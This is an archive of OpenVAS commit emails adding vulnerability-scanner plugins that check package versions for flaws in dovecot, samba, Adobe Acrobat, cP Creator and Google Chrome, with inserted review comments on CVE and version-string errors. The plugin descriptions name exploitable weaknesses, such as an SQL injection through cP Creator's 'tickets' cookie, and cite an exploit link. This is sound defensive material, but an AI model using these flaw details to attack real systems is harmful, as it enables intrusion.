An authenticated user could exploit this with a +crafted sieve script to cause a denial of service or possibly execute +arbitrary code. (CVE-2009-2632, CVE-2009-3235) + +Solution: +The problem can be corrected by upgrading your system to the +following package versions: + +Ubuntu 8.04 LTS: + dovecot-common 1:1.0.10-1ubuntu5.2 + +Ubuntu 8.10: + dovecot-common 1:1.1.4-0ubuntu1.3 + +Ubuntu 9.04: + dovecot-common 1:1.1.11-0ubuntu4.1 + +In general, a standard system upgrade is sufficient to effect the +necessary changes. + +https://secure1.securityspace.com/smysecure/catid.html?in=USN-838-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Ubuntu USN-838-1 (dovecot)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Ubuntu Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"dovecot-common", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-dev", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-imapd", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-pop3d", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-common", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-dev", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-imapd", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-pop3d", ver:"1.1.4-0ubuntu1.3", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-postfix", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} 
+if(isdpkgvuln(pkg:"dovecot-common", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-dev", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-imapd", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"dovecot-pop3d", ver:"1.1.11-0ubuntu4.1", rls:"UBUNTU9.04")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/ubuntu_839_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/ubuntu_839_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/ubuntu_839_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,278 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory USN-839-1 (samba) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65011); + script_cve_id("CVE-2009-1886", "CVE-2009-1888", "CVE-2009-2813", "CVE-2009-2906", "CVE-2009-2948"); + script_version ("$"); + script_name("Ubuntu USN-839-1 (samba)"); + + desc = " +The remote host is missing an update to samba +announced via advisory USN-839-1. + +Details follow: + +J. David Hester discovered that Samba incorrectly handled users that lack +home directories when the automated [homes] share is enabled. An +authenticated user could connect to that share name and gain access to the +whole filesystem. (CVE-2009-2813) + +Tim Prouty discovered that the smbd daemon in Samba incorrectly handled +certain unexpected network replies. A remote attacker could send malicious +replies to the server and cause smbd to use all available CPU, leading to a +denial of service. 
(CVE-2009-2906) + +Ronald Volgers discovered that the mount.cifs utility, when installed as a +setuid program, would not verify user permissions before opening a +credentials file. A local user could exploit this to use or read the +contents of unauthorized credential files. (CVE-2009-2948) + +Reinhard Ni?l discovered that the smbclient utility contained format string +vulnerabilities in its file name handling. Because of security features in +Ubuntu, exploitation of this vulnerability is limited. If a user or +automated system were tricked into processing a specially crafted file +name, smbclient could be made to crash, possibly leading to a denial of +service. This only affected Ubuntu 8.10. (CVE-2009-1886) + +Jeremy Allison discovered that the smbd daemon in Samba incorrectly handled +permissions to modify access control lists when dos filemode is enabled. A +remote attacker could exploit this to modify access control lists. This +only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-1886) + +Solution: +The problem can be corrected by upgrading your system to the +following package versions: + +Ubuntu 6.06 LTS: + samba 3.0.22-1ubuntu3.9 + smbfs 3.0.22-1ubuntu3.9 + +Ubuntu 8.04 LTS: + samba 3.0.28a-1ubuntu4.9 + smbfs 3.0.28a-1ubuntu4.9 + +Ubuntu 8.10: + samba 2:3.2.3-1ubuntu3.6 + smbclient 2:3.2.3-1ubuntu3.6 + smbfs 2:3.2.3-1ubuntu3.6 + +Ubuntu 9.04: + samba 2:3.3.2-1ubuntu3.2 + smbfs 2:3.3.2-1ubuntu3.2 + +In general, a standard system upgrade is sufficient to effect the +necessary changes. + +https://secure1.securityspace.com/smysecure/catid.html?in=USN-839-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Ubuntu USN-839-1 (samba)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com"); + script_family("Ubuntu Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"python2.4-samba", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.0.22-1ubuntu3.9", rls:"UBUNTU6.06 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} 
+if(isdpkgvuln(pkg:"libsmbclient", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.0.28a-1ubuntu4.9", rls:"UBUNTU8.04 LTS")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libwbclient0", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-tools", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} 
+if(isdpkgvuln(pkg:"winbind", ver:"3.2.3-1ubuntu3.6", rls:"UBUNTU8.10")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc-pdf", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-doc", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpam-smbpass", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient-dev", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsmbclient", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libwbclient0", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-common", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-dbg", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbclient", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"smbfs", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"winbind", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"samba-tools", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"swat", ver:"3.3.2-1ubuntu3.2", rls:"UBUNTU9.04")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} From scm-commit at wald.intevation.org Tue Oct 6 07:21:20 2009 
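Review bot: in mdksa_2009_249.nasl the three rls:"MNDK_2.0" checks at the end reuse the Corporate 3.0 release string unchanged (rpm:"libnewt0.51~0.51.6~7.1.C30mdk", the same value passed with rls:"MNDK_3.0"), and unlike every other release in the file there are no lib64 entries for MNDK_2.0. Please confirm against MDVSA-2009:249 that Multi Network Firewall 2.0 really ships the C30mdk build; if it has its own release tag, a host with the fixed package could still compare as older or newer than intended and be reported wrongly.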
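Review bot: in mdksa_2009_253.nasl (and in every other script added in this revision) the description block sets script_version ("$"); so the plugin records a literal "$" as its version, while the "# $Id$" header line next to it is a well-formed keyword. If the generator was meant to emit a Subversion keyword here, it should write script_version ("$Revision$"); and the file needs svn:keywords set, otherwise the field tells a user nothing about which revision of the check produced a finding.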
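Review bot: in ubuntu_838_1.nasl the Solution text lists the fixed versions with an epoch (dovecot-common 1:1.0.10-1ubuntu5.2, 1:1.1.4-0ubuntu1.3, 1:1.1.11-0ubuntu4.1) but the checks pass the version without it, for example isdpkgvuln(pkg:"dovecot-common", ver:"1.0.10-1ubuntu5.2", rls:"UBUNTU8.04 LTS"). Please document, in the generator or in pkg-lib-deb.inc, whether the package list gathered over SSH carries the epoch and how the comparison treats it; if the installed version string includes "1:" and the reference does not, the comparison result is not obviously correct. The same question applies to the "2:" epoch on the 8.10 and 9.04 samba versions in ubuntu_839_1.nasl. Minor: "indended" in the first description paragraph should read "intended".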
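Review bot: in ubuntu_839_1.nasl the description cites CVE-2009-1886 twice, once for the smbclient format string issue and again for the "dos filemode" access control list issue, while script_cve_id() lists CVE-2009-1888, which the text never mentions. The second citation looks like it should be CVE-2009-1888; as committed, a user searching the report text for that CVE will not find it and the two issues cannot be told apart by identifier. The reporter name in the format string paragraph has also lost a character ("Reinhard Ni?l"), so the generator is dropping non-ASCII input and should either transliterate it or emit it in a defined encoding.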
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 07:21:20 +0200 (CEST) Subject: [Openvas-commits] r5379 - in trunk/openvas-plugins: . scripts Message-ID: <20091006052120.59458852B84E@pyrosoma.intevation.org> Author: chandra Date: 2009-10-06 07:21:15 +0200 (Tue, 06 Oct 2009) New Revision: 5379 Added: trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_ibm_db2_unspesified_vuln_win.nasl trunk/openvas-plugins/scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -1,3 +1,16 @@ +2009-10-06 Chandrashekhar B + + * scripts/gb_ibm_db2_unspesified_vuln_win.nasl, + scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl, + scripts/gb_cpcreator_detect.nasl, + scripts/gb_cpcreator_sql_inj_vuln.nasl, + scripts/gb_ibm_db2_unspesified_vuln_lin.nasl, + scripts/gb_ms_ie_ssl_certi_sec_bypass_vuln_oct09.nasl, + scripts/gb_ibm_db2_mult_vuln_win_oct09.nasl, + scripts/gb_ibm_db2_mult_vuln_lin_oct09.nasl, + scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl: + Added new plugins. + 2009-10-05 Thomas Reinke *scripts/deb_1896_1.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/cve_current.txt 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -72,22 +72,22 @@ CVE-2009-3293 SecPod svn R CVE-2009-3328 SecPod CVE-2009-3327 SecPod -CVE-2009-3330 SecPod -CVE-2009-3369 SecPod -CVE-2009-2817 SecPod svn L +CVE-2009-3330 SecPod svn R +CVE-2009-3369 SecPod +CVE-2009-2817 SecPod svn L CVE-2009-3366 SecPod svn R -CVE-2009-3367 Secpod svn R -CVE-2009-3364 SecPod svn L -CVE-2009-3340 SecPod svn L -CVE-2009-3431 SecPod -CVE-2009-3444 SecPod -CVE-2009-3455 SecPod -CVE-2009-3454 SecPod -CVE-2009-3456 SecPod +CVE-2009-3367 Secpod svn R +CVE-2009-3364 SecPod svn L +CVE-2009-3340 SecPod svn L +CVE-2009-3431 SecPod svn L +CVE-2009-3444 SecPod +CVE-2009-3455 SecPod +CVE-2009-3454 SecPod svn L +CVE-2009-3456 SecPod svn L CVE-2009-3471 SecPod CVE-2009-3473 SecPod -CVE-2009-3472 SecPod -CVE-2009-3478 SecPod +CVE-2009-3472 SecPod +CVE-2009-3478 SecPod 36407 Greenbone svn R CVE-2006-5789 Greenbone svn R CVE-2009-2629 Greenbone svn R Added: trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,84 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_adobe_acrobat_pdf_dos_vuln.nasl 5056 2009-10-05 18:14:26Z oct $ +# +# Adobe Acrobat PDF File Denial Of Service Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801104); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3431"); + script_bugtraq_id(35148); + script_name("Adobe Acrobat PDF File Denial Of Service Vulnerability"); + desc = " + Overview: This host has Adobe Acrobat or Adobe Acrobat Reader installed and + is prone to Denial of Service vulnerability. + + Vulnerability Insight: + A Stack consumption error exists when handling a PDF file containing a large + number of '[' characters to the alert method. + + Impact: + Successful attacks results in Denial of Service. + + Impact Level: Application + + Affected Software/OS: + Adobe Acrobat version 9.1.1 and prior on Windows. + + Fix: No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://www.adobe.com/products/acrobat/?promoid=BPDDU + + References: + http://www.security-database.com/detail.php?alert=CVE-2009-3431 + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of Adobe Acrobat"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Denial of Service"); + script_dependencies("secpod_adobe_prdts_detect_win.nasl"); + script_require_keys("Adobe/Acrobat/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +# Check for Adobe Acrobat version <= 9.1.1 +acrobatVer = get_kb_item("Adobe/Acrobat/Win/Ver"); +if(acrobatVer) +{ + if(version_is_less_equal(version:acrobatVer, test_version:"9.1.1")) + { + security_warning(0); + exit(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_adobe_acrobat_pdf_dos_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_cpcreator_detect.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,68 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_cpcreator_detect.nasl 4962 2009-10-05 16:25:36Z oct $ +# +# cP Creator Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801005); + script_version("$Revision: 1.0$"); + script_name("cP Creator Version Detection"); + desc = " + Overview: This script finds the installed cP Creator version and saves + the result in KB. 
+ + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the version of cP Creator in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +cpcreatPort = get_http_port(default:80); +if(!cpcreatPort){ + exit(0); +} + +foreach path (make_list("/", "/cPcreator", "/cp", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/index.php"), port:cpcreatPort); + rcvRes = http_send_recv(port:cpcreatPort, data:sndReq); + if("cP Creator" >< rcvRes) + { + cpcreatVer = eregmatch(pattern:"[V|v]([0-9.]+)", string:rcvRes); + if(cpcreatVer[1] != NULL){ + set_kb_item(name:"www/" + cpcreatPort + "/cPCreator", + value:cpcreatVer[1] + " under " + path); + } + } +} Added: trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_cpcreator_sql_inj_vuln.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,95 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_cpcreator_sql_inj_vuln.nasl 4962 2009-10-05 15:11:27Z oct $ +# +# cP Creator 'tickets' Cookie SQL Injection Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801006); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3330"); + script_name("cP Creator 'tickets' Cookie SQL Injection Vulnerability"); + desc =" + Overview: The host is running cP Creator and is prone to SQL Injection + Vulnerability + + Vulnerability Insight: + Input passed to the 'tickets' cookie in index.php (if 'page' is set to + 'support' and 'task' is set to 'ticket') is not properly sanitised before + being used in SQL queries. + + Impact: + Successful exploitation could allow remote attackers to conduct SQL injection + attacks. + + Impact Level: Application. + + Affected Software/OS: + cP Creator Version 2.7.1 and prior. + + Fix: + No solution or patch is available as on 05th October, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://www.cpcreator.com/download.php + + References: + http://secunia.com/advisories/36815 + http://www.milw0rm.com/exploits/9726 + + CVSS Score: + CVSS Base Score : 6.8 (AV:N/AC:M/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.1 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version cP Creator"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) Intevation GmbH"); + script_dependencies("gb_cpcreator_detect.nasl"); + script_family("Web application abuses"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +cpcreatPort = get_http_port(default:80); +if(!cpcreatPort){ + exit(0); +} + +cpcreatVer = get_kb_item("www/" + cpcreatPort + "/cPCreator"); +if(!cpcreatVer){ + exit(0); +} + +cpcreatVer = eregmatch(pattern:"^(.+) under (/.*)$", string:cpcreatVer); +if(cpcreatVer[1] != NULL) +{ + if(version_is_less_equal(version:cpcreatVer[1], test_version:"2.7.1")){ + security_hole(cpcreatPort); + } +} Added: trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl 2009-10-06 00:49:40 UTC (rev 5378) +++ trunk/openvas-plugins/scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl 2009-10-06 05:21:15 UTC (rev 5379) 
@@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_google_chrome_sec_bypass_vuln_oct09.nasl 5092 2009-10-05 21:33:26Z oct $ +# +# Google Chrome CA SSL Certificate Security Bypass Vulnerability - Oct09 +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801108); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3456"); + script_bugtraq_id(36479); + script_name("Google Chrome CA SSL Certificate Security Bypass Vulnerability - Oct09"); + desc = " + Overview: This host is installed with Google Chrome Web Browser and is prone + to Security Bypass vulnerability. + + Vulnerability Insight: + Google Chrome fails to properly validate '\0' character in the domain name + in a signed CA certificate, allowing attackers to substitute malicious SSL + certificates for trusted ones. + + Impact: + Successfully exploitation will let the attackers to perform man-in-the-middle + attacks or impersonate trusted servers, which will aid in further attack. 
